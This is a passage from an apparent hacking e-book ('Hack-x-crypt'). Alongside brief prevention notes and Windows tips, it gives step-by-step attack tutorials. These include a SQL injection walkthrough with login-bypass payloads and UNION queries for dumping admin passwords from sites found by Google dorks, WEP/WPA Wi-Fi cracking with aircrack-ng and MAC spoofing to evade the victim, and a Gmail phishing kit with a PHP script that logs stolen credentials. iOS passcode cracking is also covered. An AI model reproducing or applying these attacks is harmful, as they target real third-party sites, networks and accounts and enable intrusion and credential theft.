61 Hack-x-crypt

HOW TO MAKE YOUR GOOGLE

SEARCHS EFFECTIVE

In this article we are going to learn how to make our Google searches
effective. If we have to find anything on Google we use to open the
Google website and start searching like if you want to download any
book on Google you use to write like this “download basic computer
engineering Book of Balagurusamy for free”. And you will find a huge

UJJWAL SAHAY
62 Hack-x-crypt

amount of results on Google like 753286543567 results in 0.43 seconds

and will make you difficult to find the exact working download link of
that book.

You can take some very simple steps to reduce your Google searches
results.
Let’s assume we have to download the same book as above mentioned.
If you use to write in the following way it will reduce your Google
searches and make it simple to find the exact download link.
Write in this way in the Google searches:-
You have to write your searches under double quotes.
Like:- “basic computer engineering Book.pdf by Balagurusamy”
Note:- don’t forget to apply the extension “.pdf”

Second method: - using “GOOGLE HACKS”

You can also use an application name as “Google hacks”.
It is easily available on the net and you can download it easily by Google
searches.

This application also helps you a lot in performing effective searches.

UJJWAL SAHAY
63 Hack-x-crypt

UJJWAL SAHAY
64 Hack-x-crypt

IOS PASSWORD CRACKING

Now these days’ people generally use 4-digit pin to secure their phone.
A mobile device gets lost or stolen and all the person recovering it has
to do is try some basic number combinations such as 1234, 1212, or
0000.and soon the will be unlocked.

Let’s see how to crack your ios password:-

1. For the first step you have to plug you iPhone or computer into
device firmware upgrade mode i.e. DFU mode:-

To enter DFU mode, simply power the device off, hold down the Home
button (bottom center) and sleep button (upper corner) at the same
time for 10 seconds, and continue holding down the Home button for
another 10 seconds. The mobile device screen goes blank.

2. after putting your phone into DFU mode you need to Load the iOS
Forensic Toolkit for this you need to insert your USB license dongle into
your computer and running Tookit.cmd:-

UJJWAL SAHAY
65 Hack-x-crypt

3.After that the work is to do is to load the iOS Forensic Toolkit Ram
disk onto the mobile device by selecting option 2 LOAD RAMDISK:-
When you loaded the RAMDISK code it allows your computer to
communicate with the mobile device and run the tools which are
needed for cracking the password (among other things).

4. Now you need to select the iOS device type/model that is connected
to your computer, as shown in Figure:-

I don’t have iphone 6 with me now so; I have selected option 14

because I have an iPhone 4 with GSM.

UJJWAL SAHAY
66 Hack-x-crypt

After that you see the toolkit which is connecting to the device and it
confirms a successful load, as shown in Figure:-

Also you will see the Elcomsoft logo in the middle of your mobile
device’s screen ……I think it looks pretty:

UJJWAL SAHAY
67 Hack-x-crypt

6. Now if you want to crack the device’s password/PIN, you have

to simply select the option 6 GET PASSCODE on the main
menu:-

iOS Forensic Toolkit will prompt you to save the passcode to a file. For
saving the passcode simply; you can press Enter to accept the default of
passcode.txt. The cracking process will commence and, with any luck,
the passcode will be found and displayed after you as shown in Figure:-

UJJWAL SAHAY
68 Hack-x-crypt

So, having no password for phones and tablets is bad, and a 4-digit PIN
such as this is also not much better choice.
So be aware about the attacks! Get up-users-getup it’s time to be
secured.

UJJWAL SAHAY
69 Hack-x-crypt

You can also use iOS Forensic Toolkit to copy files and even crack the
key chains to uncover the password that protects the device’s backups
in iTunes (option 5 GET KEYS).

PREVENTION:-
For the prevention from being hacked you can refer to the chapter
“PASSWORD CREATING POLICIES”.

UJJWAL SAHAY
70 Hack-x-crypt

HACK TO HIDE THE RECYCLE BIN

Sometimes when you just try to modify the windows GUI or even you
use to install any theme for your windows sometimes you find that the
recycle bin icon remains not modified and destroys the beauty of your
modification.

So in this article we are going to learn that how to delete the RECYCLE
BIN by hacking registry.

 For deleting the recycle bin you need to open the registry editor
of your computer.
 I think now after reading the above sections you are familiar with
the “registry editor”.
 So go through the registry editor and follow the given path.

UJJWAL SAHAY
71 Hack-x-crypt

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA00
2F954E}

 When you finally opened the last path, you will see the default
string of recycle bin is defined.
 Now DELETE that string and restart your computer.
 You will find that recycle bin is deleted.
 I am attaching a screenshot for your ease.

 By finalizing all steps don’t forget to restart your computer.

 It will work only on the restart.

UJJWAL SAHAY
72 Hack-x-crypt

WEBSITE HACKING

Now take your time and be serious and free before starting this article
because this is the very wide and one of the most interesting articles
among all of the above chapters. We will discuss in this chapter that
how to hack any vulnerable site using SQL injection.

What is SQL Injection?

SQL injection is one of the popular web applications hacking

method. Using the SQL Injection attack, an unauthorized person
can access the database of the website. Attacker can extract the
data from the Database.

UJJWAL SAHAY
73 Hack-x-crypt

What a hacker can do with SQL Injection attack?

 * ByPassing Logins
 * Accessing secret data
 * Modifying contents of website
 * Shutting down the My SQL server

So, here we start with bypassing login …….i.e.

Authentication bypass:-
In this type of SQL injection generally if we had found the Admin
login page and after that we will try to open the control panel
account of the admin by passing the authentication.

If you have the admin login page of any website then you can paste
the following codes (with quotes) to bypass the authentication of the
website ….generally PHP websites are vulnerable to this injection:-

You can find these types of sites simply by Google searches. You
have to type like this in the Google search bar:-

www.thesitename.com/adminlogin.php?
Or
/admin.php?
Or
Wp-login.php?
Etc.

After finding the login page you have to paste the following codes in
both userID and password of the admin page till it will bypassed. If

UJJWAL SAHAY
74 Hack-x-crypt

not we will try the next SQL injection i.e. union based, blind based,
error based etc.

Codes to be used as both userID and password at the admin login page
of vulnerable website for bypassing authentication are as follow:-

 ‘ or ’1'=’1  ‘ or ‘x’='x
 ‘ or 0=0 –  ” or 0=0 –
 or 0=0 –  ‘ or 0=0 #
 ” or 0=0 #  or 0=0 #
 ‘ or ‘x’='x  ” or “x”=”x
 ‘) or (‘x’='x 
 ‘ or 1=1–  ” or 1=1–
 or 1=1–  ‘ or a=a–
 ” or “a”=”a  ‘) or (‘a’='a
 “) or (“a”=”a  hi” or “a”=”a
 hi” or 1=1 –  hi’ or 1=1 –
 ‘or’1=1' 

If the authentication bypass will not work then try the following
techniques carefully and step by step:-

UNION BASED SQLi:-

 Finding Vulnerable Website:

UJJWAL SAHAY
75 Hack-x-crypt

To find a SQL Injection vulnerable site, you can use Google search
by searching for certain keywords. That keyword often called as
“GOOGLE DORK”.

Some Examples:
 inurl:index.php?id=
 inurl:gallery.php?id=
 inurl:article.php?id=
 inurl:pageid=

Now you have to Copy one of the above keyword and Google it.
Here, we will get a lot of search results with which we have to visit
the websites one by one for finding the vulnerability.

For example:-

site:www.anyselectedsite.com inurl:index.php?id=

Step 1: Findinging the Vulnerability:

Now let us the vulnerability of the target website. To the

vulnerability, add the single quotes(') at the end of the URL and press
enter.

For eg:
http://www.anyselectedsite.com/index.php?id=2'

If the page remains in same page or showing that page not found,
then it is not vulnerable.

If you got an error message just like this, then it means that the site
is vulnerable.

UJJWAL SAHAY
76 Hack-x-crypt

You have an error in your SQL syntax; the manual that corresponds
to your MySQL server version for the right syntax to use near '\'' at
line 1

Step 2: Finding Number of columns in the database:

Great, we have found that the website is vulnerable to SQLi attack.

Our next step is to find the number of columns present in the target
Database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like
"unknown column ".

For eg:
http://www.anyselectedsite.com/index.php?id=2 order by 1
http://www.anyselectedsite.com/index.php?id=2 order by 2
http://www.anyselectedsite.com/index.php?id=2 order by 3
http://www.anyselectedsite.com/index.php?id=2 order by 4
If you get the error while trying the "n"th number, then number of
column is "n-1".

I mean:-

http://www.anyselectedsite.com/index.php?id=2 order by 1(no

error shown shown)
http://www.anyselectedsite.com/index.php?id=2 order by 2(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 3(no
error shown)

UJJWAL SAHAY
77 Hack-x-crypt

http://www.anyselectedsite.com/index.php?id=2 order by 4(no

error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 5(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 6(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 7(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 8(error
shown)

So now n=8, the number of column is n-1 i.e., 7.

In case, if the above method fails to work for you, then try to add
the "--" at the end of the statement.
For eg:-

http://www.anyselectedsite.com/index.php?id=2 order by 1--

Step 3: Find the Vulnerable columns:

We have successfully found the number of columns present in the

target database. Let us find the vulnerable column by trying the
query "union select columns sequence".

Change the id value to negative (i mean id=-2). Replace the

columns_sequence with the no from 1 to n-1(number of columns)
separated with commas (,).

For eg:

If the number of columns is 7, then the query is as follow:

UJJWAL SAHAY
78 Hack-x-crypt

http://www.anyselectedsite.com/index.php?id=-2 union select 1,

2,3,4,5,6,7—

Ifyou have applied the above method and is not working then try
this:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union
select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.

Bingo, column '3' and '7' are found to be vulnerable. Let us take the
first vulnerable column '3' . We can inject our query in this column.

Step 4: Finding version,database,user

Replace the 3 from the query with "version()"

For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union

select 1, 2, version(),4,5,6,7—

Now, It will display the version as 5.0.2 or 4.3. Something likes this.

UJJWAL SAHAY
79 Hack-x-crypt

Replace the version () with database () and user() for finding the
database,user respectively.

For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union

select 1,2,database(),4,5,6,7--

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union

select 1,2,user(),4,5,6,7--

If the above is not working, then try this:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union

select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 5: Finding the Table Name

If the Database version is 5 or above. If the version is 4.x, then you
have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with
"group_concat(table_name) and add the "from
information_schema.tables where table_schema=database()"

For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union

select 1,2,group_concat(table_name),4,5,6,7 from
information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which
is related with the admin or user.

UJJWAL SAHAY
80 Hack-x-crypt

Let us choose the "admin " table.

Step 6: Finding the Column Name

Now replace the "group_concat(table_name) with the

"group_concat(column_name)"

Replace the "from information_schema.tables where

table_schema=database()--" with "FROM
information_schema.columns WHERE table_name=mysqlchar—

We have to convert the table name to MySql CHAR() string .

Install the HackBar addon from:-

https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you installed the add-on, you can see a toolbar that will look
like the following one. If you are not able to see the Hackbar, then
press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.

UJJWAL SAHAY
81 Hack-x-crypt

It will ask you to enter string that you want to convert to

MySQLCHAR(). We want to convert the table name to MySQLChar .
In our case the table name is 'admin'.

Now you can see the CHAR(numbers separated with commans) in

the Hack toolbar.

Copy and paste the code at the end of the url instead of the
"mysqlchar"

For eg:

UJJWAL SAHAY
82 Hack-x-crypt

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union

select 1,2,group_concat(column_name),4,5,6,7 from
information_schema.columns where table_name=CHAR(97, 100,
109, 105, 110)—

The above query will display the list of column.

For example:

admin,password,admin_id,admin_name,admin_password,active,id,a
dmin_name,admin_pass,admin_id,admin_name,admin_password,ID
_admin,admin_usern me,username,password..etc..

Now replace the replace group_concat(column_name) with

group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where

table_name=CHAR(97, 100, 109, 105, 110)" with the "from
table_name"

For eg:

http://www.anyselectedsite.com/index.php?id=-2
and 1=2 union select
1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from
admin--
If the above query displays the 'column is not found' error, then try
another column name from the list.

If we are lucky, then it will display the data stored in the database
depending on your column name. For example, username and
password column will display the login credentials stored in the
database.

UJJWAL SAHAY
83 Hack-x-crypt

Step 7: Finding the Admin Panel:

Just try with url like:

http://www.anyselectedsite.com/admin.php
http://www.anyselectedsite.com/admin/
http://www.anyselectedsite.com/admin.html
http://www.anyselectedsite.com:2082/
etc.

If you are lucky, you will find the admin page using above urls or you
can use some kind of admin finder tools like Havij admin finder, sql
poison for SQL attacking (tool).

And once you found the admin panel you have to do further works
on your own risk.

PREVENTION:-

This article is focused on providing clear, simple, actionable guidance

for preventing SQL Injection flaws in your applications. SQL Injection
attacks are unfortunately very common, and this is due to two
factors:-

1.) The significant prevalence of SQL Injection vulnerabilities, and

2.) The attractiveness of the target (i.e., the database typically
contains all the interesting/critical data for your application).

UJJWAL SAHAY
84 Hack-x-crypt

It’s somewhat shameful that there are so many successful SQL

Injection attacks occurring, because it is EXTREMELY simple to avoid
SQL Injection vulnerabilities in your code.

SQL Injection flaws are introduced when software developers create

dynamic database queries that include user supplied input. To avoid
SQL injection flaws is simple. Developers need to either: a) stop
writing dynamic queries; and/or b) prevent user supplied input
which contains malicious SQL from affecting the logic of the
executed query.

This article provides a set of simple techniques for preventing SQL

Injection vulnerabilities by avoiding these three problems. These
techniques can be used with practically any kind of programming
language with any type of database.

SQL injection flaws typically look like this:-

The following (Java) example is UNSAFE, and would allow an attacker

to inject code into the query that would be executed by the
database. The invalidated “customerName” parameter that is simply
appended to the query allows an attacker to inject any SQL code
they want. Unfortunately, this method for accessing databases is all
too common.

UJJWAL SAHAY
85 Hack-x-crypt

String query = "SELECT account_balance FROM user_data WHERE

user_name = "
+ request.getParameter("customerName");

try {
Statement statement = connection.createStatement( … );
ResultSet results = statement.executeQuery( query );
}

PREVENTIONS
Option 1: Prepared Statements (Parameterized Queries):-

The use of prepared statements (parameterized queries) is how all

developers should first be taught how to write database queries. They
are simple to write, and easier to understand than dynamic queries.
Parameterized queries force the developer to first define all the SQL
code, and then pass in each parameter to the query later. This coding
style allows the database to distinguish between code and data,
regardless of what user input is supplied.

Prepared statements ensure that an attacker is not able to change the

intent of a query, even if SQL commands are inserted by an attacker. If
an attacker were to enter the user ID ' or '1'='1 , the parameterized
query would not be vulnerable.

2. Use dynamic SQL only if absolutely necessary.

UJJWAL SAHAY
86 Hack-x-crypt

Dynamic SQL can almost always be replaced with prepared statements,

parameterized queries, or stored procedures. For instance, instead of
dynamic SQL, in Java you can use PreparedStatement() with bind
variables, in .NET you can use parameterized queries, such as
SqlCommand() or OleDbCommand() with bind variables, and in PHP you
can use PDO with strongly typed parameterized queries (using
bindParam()).

In addition to prepared statements, you can use stored procedures.

Unlike prepared statements, stored procedures are kept in the
database but both require first to define the SQL code, and then to pass
parameters.

3:- Escaping All User Supplied Input

This third technique is to escape user input before putting it in a query.

If you are concerned that rewriting your dynamic queries as prepared
statements or stored procedures might break your application or
adversely affect performance, then this might be the best approach for
you. However, this methodology is frail compared to using
parameterized queries and i cannot guarantee it will prevent all SQL
Injection in all situations. This technique should only be used, with
caution, to retrofit legacy code in a cost effective way. Applications
built from scratch, or applications requiring low risk tolerance should be
built or re-written using parameterized queries.

This technique works like this. Each DBMS supports one or more
character escaping schemes specific to certain kinds of queries. If you

UJJWAL SAHAY
87 Hack-x-crypt

then escape all user supplied input using the proper escaping scheme
for the database you are using, the DBMS will not confuse that input
with SQL code written by the developer, thus avoiding any possible SQL
injection vulnerabilities.

4. Install patches regularly and timely.

Even if your code doesn't have SQL vulnerabilities, when the database
server, the operating system, or the development tools you use have
vulnerabilities, this is also risky. This is why you should always install
patches, especially SQL vulnerabilities patches, right after they become
available.

5. Remove all functionality you don't use.

Database servers are complex beasts and they have much more
functionality than you need. As far as security is concerned, more is not
better. For instance, the xp_cmdshell extended stored procedure in MS
SQL gives access to the shell and this is just what a hacker dreams of.
This is why you should disable this procedure and any other
functionality, which can easily be misused.

6. Use automated test tools for SQL injections.

UJJWAL SAHAY
88 Hack-x-crypt

Even if developers follow the rules above and do their best to avoid
dynamic queries with unsafe user input, you still need to have a
procedure to confirm this compliance. There are automated test tools
to check for SQL injections and there is no excuse for not using them to
check all the code of your database applications.

UJJWAL SAHAY
89 Hack-x-crypt

TESTING SQL INJECTION BY USING TOOL

One of the easiest tool to test SQL injections is the Firefox extension
named SQL Inject ME. After you install the extension, the tool is
available in the right-click context menu, as well as from Tools →
Options. The sidebar of SQL Inject ME is shown in the next screenshot
and as you can see there are many tests you can run:

UJJWAL SAHAY
90 Hack-x-crypt

You can choose which tests to run and which values to test. When you
press one of the Test buttons, the selected tests will start. When the
tests are done, you will see a report of how the tests ended.

There are many options you can set for the SQL Inject ME extension, as
shown in the next two pictures: -

UJJWAL SAHAY
91 Hack-x-crypt

UJJWAL SAHAY
92 Hack-x-crypt

As you see, there are many steps you can take in order to clean your
code from potential SQL injection vulnerabilities. Don't neglect these
simple steps because if you do, you will compromise the security not
only of your sites but also of all the sites that are hosted with your web
hosting provider.

UJJWAL SAHAY
93 Hack-x-crypt

WI-FI HACKING USING BACKTRACK

After performing the SQL injection, I can bet that now you have the
endless curiosity to explore more about the ethical hacking. And as
according to your need now in this article we are going to perform a
hardcore hack using Backtrack Linux. we are going to learn that how to
crack the WI-FI using Backtrack.one more thing I want to add here that
all these stuff I am sharing with you is only for study purpose .if you
have the black intentions just leave the book now. If you are
performing this article on your computer, you will be responsible for
any damage occurred by you.

So let’s start the article:-

Now let us start with the Wi-Fi cracking. But before starting the tutorial
let me give you a small introduction to what Wi-Fi hacking is and what
is the security protocols associated with it.

In a secured wireless connected the data on internet is sent via

encrypted packets. These packets are secured with network keys.

UJJWAL SAHAY
94 Hack-x-crypt

There are basically 2 types of security keys:-

WEP (Wireless Encryption Protocol):- This is the most basic form of

encryption. This has become an unsafe option as it is vulnerable and
can be cracked with relative ease. Although this is the case many
people still use this encryption.

WPA (WI-FI Protected Access) : This is the most secure wireless

encryption. Cracking of such network requires use of a wordlist with
common passwords. This is sort of brute force attack. This is virtually
uncrackable if the network is secured with a strong password

So let’s begin the actual Wi-Fi Hacking tutorial!

In order to crack Wi-Fi password, you require the following things:

For the Wi-Fi hacking you need to install the Backtrack on your
computer.

I am assuming that you have already installed the Backtrack on your pc.

If not it’s very easy to install by making bootable live CD/DVD.

For installing processes you can just Google it. You will get it easily.

UJJWAL SAHAY
95 Hack-x-crypt

Now open the console from the taskbar, Click on the icon against the
dragon like icon in the taskbar in the above screenshot.

You will have a Command Prompt like Shell called as console

terminal.

1) Let's start by putting our wireless adapter in monitor mode. It

allows us to see all of the wireless traffic that passes by us in the air.
Type airmon-ng in the console terminal and press Enter. You will
have a screen like this, note down the name of interface, in this case
the name is wlan0.

UJJWAL SAHAY
96 Hack-x-crypt

2) Now type ifconfig wlan0 down and hit enter.

This command will disable your wireless adapter; we are doing this
in order to change your MAC address.

Now, you need to hide your identity so that you will not be identified
by the victim.to do this you need to type ifconfig wlan0 hw ether
00:11:22:33:44:55 and hit enter.
This command will change your MAC address to 00:11:22:33:44:55.

3) Now the next work is to type airmon-ng start wlan0 and press
enter.
This will start the wireless adapter in monitor mode. Note down the
new interface name, it could be eth0 or mon0 or something like that.

UJJWAL SAHAY
97 Hack-x-crypt

The above command in the console has started your network

adapter in monitor mode as mon0:

4) Now that our wireless adapter is in monitor mode, we have the

capability to see all the wireless traffic that passes by in the air. We
can grab that traffic by simply using the airodump-ng command.

This command grabs all the traffic that your wireless adapter can see
and displays critical information about it, including the BSSID (the
MAC address of the AP), power, number of beacon frames, number
of data frames, channel, speed, encryption (if any), and finally, the
ESSID (what most of us refer to as the SSID).
Let's do this by typing:

UJJWAL SAHAY
98 Hack-x-crypt

airodump-ng mon0

In the above screenshot there is a list of available networks, Choose 1

network and note the BSSID and channel of it.

5.) Type airodump-ng -c channel no –bssid BSSIDN1 mon0 -w filename

and hit enter.
Replace channel no. and BSSIDN1 with the data from step 4. Replace
the mon0 with network interface name from step 3. In place of
filename write any name and do remember that. Better use filename
itself.

UJJWAL SAHAY
99 Hack-x-crypt

This command will begin capturing the packets from the network. You
need to capture more and more packets in order to crack the Wi-Fi
password. This packet capturing is a slow process.

6.) To make the packet capturing faster, we will use another command.
Open a new shell, don’t close the previous shell. In new shell type
aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit enter.
Replace the BSSIDN1 with the data from step 4 and mon0 from step 3.
This command will boost the data capturing process.
The -1 tells the program the specific attack we wish to use which in this
case is fake authentication with the access point. The 0 cites the delay
between attacks, -a is the MAC address of the target access point, -h is
your wireless adapters MAC address and the command ends with your
wireless adapters device name.

7.) Now wait for few minutes, let the DATA in the other console reach a
count of 5000.

UJJWAL SAHAY
100 Hack-x-crypt

8.) After it reaches 5000, open another console and type aircrack-ng
filename-01.cap and hit enter.
Replace the filename with the name you used in step 5. Add -01.cap to
it. .cap is the extension of file having captured data packets.
After typing this command, aircrack will start trying to crack the Wi-Fi
password. If the encryption used is WEP, it will surely crack the
password within few minutes.

In case of WPA use the following command instead of the above

aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b
BSSIDN1 filename-01.cap

Replace BSSIDN1 and filename with data you used.

/pentest/wireless/aircrack-ng/test/password.lst is the address of a file
having wordlist of popular passwords. In case of WPA aircrack will try to
brute force the password. As I explained above that to crack WPA you
need a file having passwords to crack the encryption. If you are lucky
enough and the network owner is not smart enough, you will get the
password.

UJJWAL SAHAY
101 Hack-x-crypt

PREVENTION:-
For the prevention from being hacked you can refer to the chapter
“PASSWORD CREATING POLICIES”.

UJJWAL SAHAY
102 Hack-x-crypt

EMAIL AND FACEBOOK HACKING BY PHISHING

What is phishing?

Phishing is an attempt by the sender to have the receiver of the

email to release their personal information i.e. the attacker lures the
victims to give some confidential information.

Why phishing?

There are many password cracking tools that are coming and going
into/from the market. But phishing is the most efficient method to
steal confidential information like, passwords, Credit card numbers,
Bank account numbers etc.

UJJWAL SAHAY
103 Hack-x-crypt

How phishing works?

It works just like normal fishing.

A fisherman generally throws bait into the water to lure the fish.
Then a fish comes to take the food feeling that it is legitimate. When
it bites the bait, it will be caught by the hook. Now the fisherman
pulls out the fish.

In the same way, the hacker sends a fake login page to the victim.
The victim thinks that it is a legitimate one and enters his
confidential information. Now the data will be with the hacker.

Now, let’s learn how to hack by phishing:-

I am selecting Gmail account to be hacked by phishing.

For phishing you need the following stuffs:-

 First of all you have to open the gamil.com by your browser and
when page open completely ,just give a right click on the page and
a dialogue box will opens after you having an option “view page
source” in it.
 Click on the “view page source” option and you see that the
source code of that page will opens after you.
 Then press ctrl+F to open the text/word finding box.
 Type “action=” and replace it with anything.php
Such as “action=mail.php”
 Then find for the “method=” and also replace it with “get”.
Such as method=”get”.

 Then save the file by anything.html

Such as “Gmail.html”

 Then create a blank notepad file “log.txt”

UJJWAL SAHAY
104 Hack-x-crypt

 The again open the notepad and type the following codes:

<?php
header("Location: http://www.Gmail.com");
$handle = fopen("logs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

 And save it as “mail.php” (save this file by same name as you have
replaced the “action=”)
 Now finally you have the three files which are required for the
phishing.
 1) Gmail.html (fake login page)
 2) mail.php (to capture the login details)
 3) log.txt (to store the captured details)

Procedure:-
step1: create an account in any free web hosting site like
www.bythost.com
www.000webhost.com
www.ripway.com
www.my3gb.com
step2: Now upload all the three files you have downloaded.(I have
taken www.my3gb.com)

UJJWAL SAHAY
105 Hack-x-crypt

step 3: Give the link of the fake page to your victim.

eg: www.yoursitename.my3gb.com/Gmail.html
step 4:when he clicks the link, it opens a fake Gmail page where he
enters his login details. When he clicks sign in button, his login
details will be stored in log.txt file.

Demonstration:-
Here i have uploaded my scripts on to www.my3gb.com

And copy the Gmail.html link which you have to send the victim.
i clicked the Gmail.html link

A fake page was opened where i entered my login details.

UJJWAL SAHAY
106 Hack-x-crypt

This page will looks exactly similar to the original Gmail login page.
And when the victim enters his/her login details for logging in into
his/her account.
Now, this time the victim will redirected to the original Gmail login
website.
The victim will even don’t know that his/her account got hacked.
Victim will think that the page gets reloaded due to internet errors or
login mistakes etc.

Now his/her login details were captured by the php script and stored in
log.txt file as shown in the figure below:-

UJJWAL SAHAY
107 Hack-x-crypt

In the same way you can hack FACEBOOK accounts and other social
networking accounts.

How to protect ourselves from phishing?

 Don’t use links

 Be suspicious of any e-mail with urgent requests

 By using secured websites

 Using efficient browsers

 Using Antivirus or internet security software.

UJJWAL SAHAY
108 Hack-x-crypt

TIPS FOR MAKING WINDOWS BETTER

AND SECURE

UJJWAL SAHAY
109 Hack-x-crypt

Arrange your folders

Documents are hard to find if you put them all in the same place on
your disk, such as the My Documents folder. So make sure that you
organize your documents into folders — perhaps one for work, one for
household stuff, one for your hobbies, and so on. Don’t forget that you
can also put folders inside other folders so you might create subfolders
in your work folder for each project you’re working on.

UJJWAL SAHAY
110 Hack-x-crypt

De clutter your desktop

The reason for putting icons are on your desktop is to make it easier to
find the applications and documents that you use most often. However,
if all your applications have desktop icons, then that advantage is lost.
That makes it a good idea to remove all the clutter on the desktop. You
could also try moving icons around so that related software (for
example, Word, Excel and PowerPoint) is grouped together —
remember to disable ‘Auto arrange icons’ first by right clicking the
desktop, selecting View and then using the option.

UJJWAL SAHAY
111 Hack-x-crypt

Pin folders to Windows Explorer

Make folders easier to access by pinning them to Windows Explorer.

You just drag the folder from Windows Explorer into the taskbar to pin
it. Now, if you right-click on the Windows Explorer icon in the taskbar,
any pinned folders will appear at the top of the list. Only pin folders
you’re using a lot (to unpin them, click on the pushpin in the list),
otherwise they’ll get lost among all the other pinned folders.

Use multiple desktops

We’ve already recommended de-cluttering your desktop but there is

another effective way to simplify your screen and that is to set up
multiple virtual desktops and divide all the different icons you need
between them. You could have one desktop for games, for example,
one for office productivity applications, and another for photographic
and graphic works.

UJJWAL SAHAY
112 Hack-x-crypt

Highlight important folders

Want to be able to notice important folders at a glance in Windows

Explorer or your applications? The secret is to highlight those folders
using a different icon than the usual picture of a beige folder. To do
this, right-click on the folder in Windows Explorer, select Properties and
then the Customize tab. Click on ‘Change Icon’ and make your choice.
You can even use your own icon by clicking Browse and choosing an
image.

UJJWAL SAHAY
113 Hack-x-crypt

Configure Windows Explorer

Windows Explorer lets you display the contents of folders in various

ways and remembers what you’ve chosen, so it makes sense to choose
appropriate views for each folder. For one containing photos, for
example, use medium or large icons so you can see a thumbnail of
each; for one with Word documents, selecting List lets you view more
files on screen at once.

Use of Smart Screen

Windows 8 has a built-in malware filter called SmartScreen that

protects your PC from online threats, from spam emails to phishing
web sites, and much more besides.
Unlike in previous versions of Windows, this works independently from
Internet Explorer and it shouldn’t be disabled - for obvious reasons.
SmartScreen will display an unmissable on-screen warning when it
detects potentially harmful activity.

UJJWAL SAHAY
114 Hack-x-crypt

Optimize text and icon size

While you can zoom inside most applications if the text is too small, you
might find the text and icons in Windows too small to read easily if you
have a high-resolution display (3840x2160, say). If so, up the size to 125
percent or 150 percent at Control Panel > Appearance and
Personalization > Display > Make text and other items larger or smaller.

Add user accounts

If more than one person uses your PC, set up user accounts so that
each can configure Windows the way they like it without affecting
everyone else. It also lets each user easily keep their documents
together but separate from everyone else’s. Go to Control Panel > User
Accounts and Family Safety > Add or remove user accounts.

Use desktop gadgets

Although not included with Windows 8 as standard, Windows 7 has

several useful desktop gadgets — a calendar, for example. Right-click
on the desktop, select Gadgets from the menu and drag any gadgets
you want from the Gadgets window onto your desktop

Learn a few shortcuts

Although you can do pretty much everything using menus, Windows

also defines lots of key sequences that are used by applications as well.
This might seem an old-fashioned way of working but using shortcuts is
often a lot quicker than selecting entries from menus.
You’re not going to learn them all at once but three commonly used
actions that you can easily remember to speed things up are Ctrl-X for
cut, Ctrl-C for copy, and Ctrl-V for paste. Menus often display any
keyboard shortcuts available for options.

UJJWAL SAHAY
115 Hack-x-crypt

Make use of libraries

Libraries make it a lot easier to manage some types of files — most

commonly used documents, music, photos and videos, for instance.
They might look like ordinary folders but they’re far more. Rather than
putting files and folders into libraries — although you can do that too
-you just tell Windows which folders to include in each library. The files
aren’t actually copied to the library; they remain in their original
locations but appear to be in the library too.

Use sticky notes

If you like the idea of leaving yourself reminders on the screen of your
computer, then Sticky Notes is for you. You’ll find it by searching in the
Start menu or screen. When you run Sticky Notes, a blank sticky note
appears on-screen. Just type whatever reminder you want into it; if you
want to change the color of the note, you’ll find the relevant options by
right-clicking. Click on the + sign to create another sticky note.

Search out huge files

Big files clog up your hard drive and many are just garbage that you can
delete. Instead of downloading a utility to find and remove them, use
Windows Explorer. Simply type size:gigantic into the Search box and
Windows will show you all files larger than 128MB in the folder (and
subfolders) you’re currently browsing. Delete any that you’re sure you
don’t need.

Search on Windows 8 Start screen

You can search for applications or documents in Windows 7 by using

the search box on the Start menu but in Windows 8 searching are

UJJWAL SAHAY
116 Hack-x-crypt

easier still. So long as you’re in the Start screen, just begin typing the
name of a document in a library or an application and the search box
will appear automatically.

Group Windows 8 tiles

If your Windows 8 Start screen is cluttered with tiles, try grouping them
so that the related ones are kept together. Drag your first tile to an
open space at the left or right of the Start screen. When a grey bar
appears behind it, to indicate that it’s part of a new group, release the
tile. Now drag the other tiles that you want to appear in the group into
the same area.

Use windows defender

The Windows Defender anti-malware application was already part of

Windows 7, but the version included with Windows 8 is much more
capable - Windows 7 users need to download the free Microsoft
Security Essentials to get similar features.

Search for Windows Defender at the Start screen, select the

application from the results and enable Windows Defender if it’s
currently disabled. Click the Settings tab, then select Real-time
protection in the left of the window and check that this is option
enabled before clicking the Save changes button.

Next, click the Update tab and click the Update button to update
Windows Defender’s malware definitions. If this is the first time you’ve
